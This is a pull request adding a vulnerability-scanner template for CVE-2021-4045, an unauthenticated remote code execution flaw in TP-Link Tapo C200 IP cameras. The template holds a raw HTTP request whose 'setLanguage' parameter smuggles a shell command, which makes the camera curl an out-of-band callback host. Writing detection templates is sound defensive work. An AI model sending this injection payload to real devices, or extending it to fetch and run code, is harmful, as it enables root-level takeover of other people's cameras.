### PR TITLE
Create CVE-2021-4045.yaml

### DIFF
--- a/cves/2021/CVE-2021-4045.yaml
+++ b/cves/2021/CVE-2021-4045.yaml
@@ -1,0 +1,36 @@
+id: CVE-2021-4045
+
+info:
+  name: TP-Link Tapo c200 1.1.15 - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-4045
+    - https://www.exploit-db.com/exploits/51017
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2021-4045
+    cwe-id: CWE-77
+  tags: cve,cve2021,unauth,rce,oast,tplink
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Content-Type: application/json
+
+        {"method": "setLanguage", "params": {"payload": "';curl {{interactsh-url}};'"}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+# Enhanced by mp on 2022/05/05


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-4045

```
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
```

Thanks

- References: https://www.exploit-db.com/exploits/51017

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO